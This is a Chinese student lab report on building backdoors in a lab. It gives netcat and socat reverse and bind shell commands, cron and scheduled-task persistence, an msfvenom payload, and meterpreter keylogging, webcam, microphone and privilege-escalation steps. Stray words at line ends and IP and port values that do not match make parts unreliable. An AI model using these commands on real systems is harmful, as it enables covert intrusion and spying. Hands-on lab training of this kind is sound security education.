後門是指那些繞過安全性控制而獲取對系統訪問權的程序linux
(1)例舉你能想到的一個後門進入到你係統中的可能方式?shell
非官方網站下載應用程序時,該應用程序可能綁定了一些可執行文件,所以留下後門。或者當咱們打開一個網頁時,若是該網頁會自動連接到木馬程序的話,就會在後臺自動下載安裝木馬的安裝程序,windows
並會自動安裝木馬,生成可執行文件,以此在系統留下後門。安全
(2)例舉你知道的後門如何啓動起來(win及linux)的方式?網絡
Windows:設置爲開機自啓動、修改註冊表項、用戶執行帶有後門的可執行文件tcp
Linux:經過crontab功能將後門設爲定時啓動;也能夠經過對正常軟件綁定注入shellcode編輯器
(3)Meterpreter有哪些給你映像深入的功能?工具
在植入後門後,能夠控制被控主機的shell,執行指令;獲取被控主機的錄音、錄像、截圖、鍵盤輸入記錄等。學習
(4)如何發現本身有系統有沒有被安裝後門?網站
打開防火牆,查看有沒有異常開放的端口;
安裝殺毒軟件,實時監控電腦,定時對系統進行檢測;
一、在實驗前關閉或退出了防火牆、360殺毒軟件、電腦衛士等全部的電腦保護軟件,避免在實驗過程當中攻擊時被拒絕。
二、使用Windows獲linux shell
(1)在Windows下使用ipconfig
查看本機IP,地址爲192.168.230.1
(2) 使用ncat.exe程序打開監聽ncat.exe -l -p 4322
(3) 在kali中反彈鏈接Windows,nc 192.168.230.1 4322 -e /bin/sh
,使用-e
選項執行shell程序。
Windows成功得到kali的shell。
三、使用linux獲windows shell
(1)使用ifconfig查看IP,爲:192.168.33.131
(2)打開監聽nc -l -p 4322
在Windows中反彈鏈接kali,ncat.exe -e cmd.exe 192.168.33.131 4322
kali成功得到Windows的命令提示
四、使用nc傳輸數據
Windows下監聽4322端口,ncat.exe -l 4322
kali反彈鏈接到Windows的4322端口,nc 192.168.230.1 4322
鏈接創建成功,雙方能夠相互傳輸數據
實驗內容
參數說明
>
輸出到哪一個文件
1、使用netcat獲取主機操做Shell,cron啓動
Cron是Linux下的定時任務,每一分鐘運行一次,根據配置文件執行預設的指令。
在Windows系統下,監聽4322端口
在Kali環境下,用crontab -e
指令編輯一條定時任務,選擇編輯器時選擇3
(第一次會提示選擇編輯器,之後就不會提示了);
在最後一行添加45 * * * * /bin/netcat 192.168.230.1 4322 -e /bin/sh
,意思是在每一個小時的第45分鐘反向鏈接Windows主機的4322端口,
設置成45的緣由是我當時的時間是14點42,爲了能立馬看到效果,因此我將時間設置成了45。保存並退出 :wq
crontab -l 可查看配置的任務
當時間到了第22分時,win得到linux的shell,可執行相關命令
2、使用socat獲取主機操做Shell, 任務計劃啓動
socat:
- socat是ncat的加強版,它使用的格式是socat [options] <address> <address>
,其中兩個address
是必選項,而options
是可選項。
- socat的基本功能就是創建兩個雙向的字節流,數據就在其間傳輸,參數address
就是表明了其中的一個方向。所謂流,表明了數據的流向,而數據則能夠有許多不一樣的類型,命令中也就相應須要許多選項對各類不一樣的類型數據流進行限定與說明。
在Windows系統下,打開:控制面板->系統和安全->管理工具->任務計劃程序,在操做選項(菜單欄)中,選擇「建立任務」,填寫任務名稱123,以後,新建觸發器,選擇開始任務時間爲:工做站鎖定時。
.新建操做,選擇啓動的程序爲socat.exe,
參數項填爲tcp-listen:4322 exec:cmd.exe,pty,stderr ,含義爲:把cmd.exe
綁定到端口號,同時把cmd.exe的stderr
重定向到stdout
上
(注:這裏填寫任務名稱是第一次是123,可是因爲出現問題,我從新作了一遍,而後第二次填寫的任務名稱是hyt,當時這部分的圖已經截好了,因此沒有截第二次,可是在任務三中用到該文件時文件名爲hyt)
建立完成以後,按Win+L 快捷鍵鎖定計算機,再次打開時,能夠發現以前建立的任務已經開始運行,
(可是不明白爲何,我再次打開後依舊沒有運行,因此只好手動運行)
在kali終端輸入指令socat - tcp:192.168.28.166:7777 (注:socat裏面,必須有兩個流,這裏的第一個流[參數-]表明標準的輸入輸出,第二個流表示鏈接到Win7主機的7777端口),此時可發現已經成功得到了一個windows shell
3、使用MSF meterpreter(或其餘軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell
生成後門程序,指令爲 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.33.131 LPORT=4322 -f exe > hyt_backdoor.exe
(注:這裏設置的主機IP、端口爲kali[攻擊機]的IP、端口)
win10上運行ncat命令,等待接收hyt_backdoor.exe
ncat.exe -lv 4322 > hyt_backdoor.exe
kali上運行ncat命令,傳輸hyt_backdoor.exe到win10主機(IP:192.168.230.1)上
ncat -nv 192.168.230.1 4322 < hyt_backdoor.exe
效果如圖:
在kali上使用msfconsole 指令進入msf控制檯
進行配置:
use exploit/multi/handler //使用handler模塊
set payload windows/meterpreter/reverse_tcp //設置載荷,字面意思應該是基於TCP的反向鏈接反彈windows shell
show options //查看利用模塊的設置信息 set LHOST 192.168.28.181 //接下來的兩個set是配置模塊的設置信息,這裏是設置本主機kali的IP set LPORT 7777 //設置本主機的端口 show options //再次查看一下options,確保設置正確 exploit //運行模塊
查看kali,發現得到了win10主機的鏈接,而且獲得了遠程控制的shell,可執行相關命令
4、使用MSF meterpreter(或其餘軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權
由上面的exploit操做,已經得到shell,接下來,嘗試獲取目標主機音頻、攝像頭、擊鍵記錄等內容
獲取目標主機音頻、截屏內容:
record_mic //音頻 screenshot //截屏
效果如圖:
windows中有攝像設備,能夠獲取一下攝像頭所拍攝相片(如圖)
kali上輸入指令keyscan_start ,開始記錄windows上任何鍵盤記錄,隨意在windows上輸入一些字母,以後kali上輸入指令keyscan_dump ,就可下載鍵盤記錄
我在一個文檔中輸入了本身的學號(linux終端有顯示)
先使用getuid 指令查看當前用戶,再使用getsystem 指令進行提權,可是提權失敗,上網搜索緣由,說是在windows機器上須要以管理員身份運行,才能提權, 因此我就以管理員的身份運行了一下
提權成功
實驗感想:經過本次實驗,我對網絡安全方面的只是有了一些瞭解,以前學習的都比較理論,這種實際操做感受很神奇,雖然如今的我僅僅只是瞭解後門的基本原理,可是我對信息安全的防禦意識提升了。發現系統防範入侵的能力很低,因此以後必定要更加註重信息安全。